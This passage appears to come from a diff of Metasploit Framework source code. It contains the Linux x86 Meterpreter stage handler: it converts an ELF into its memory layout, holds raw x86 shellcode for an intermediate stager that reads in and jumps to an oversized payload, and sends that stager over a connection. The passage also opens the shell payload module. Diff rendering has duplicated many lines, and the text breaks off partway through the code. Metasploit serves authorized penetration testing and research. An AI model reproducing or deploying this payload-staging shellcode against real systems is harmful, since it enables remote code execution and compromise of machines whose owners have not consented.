used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
end
}
# Maybe at some stage zero out elf header / program headers in case tools
# try to look for them
# Maybe at some stage zero out elf header / program headers in case tools
# try to look for them
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
return mem[0, used]
end
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
return mem[0, used]
end
def handle_intermediate_stage(conn, payload)
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
def handle_intermediate_stage(conn, payload)
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
midstager <<
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
"\xd1\xff\xff\xff"
midstager <<
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
"\xd1\xff\xff\xff"
# Patch in debug options
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
# Patch in debug options
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
# Patch entry point
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
# Patch entry point
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
# Maybe in the future patch in base.
# Maybe in the future patch in base.
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
conn.put(midstager)
Rex::ThreadSafe.sleep(1.5)
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
conn.put(midstager)
Rex::ThreadSafe.sleep(1.5)
# Send length of payload
conn.put([ payload.length ].pack('V'))
return true
# Send length of payload
conn.put([ payload.length ].pack('V'))
return true
end
end
def generate_stage
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
def generate_stage
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
met = File.open(file, "rb") {|f|
f.read(f.stat.size)

4
modules/payloads/stages/linux/x86/shell.rb
View File

@ -10,8 +10,8 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,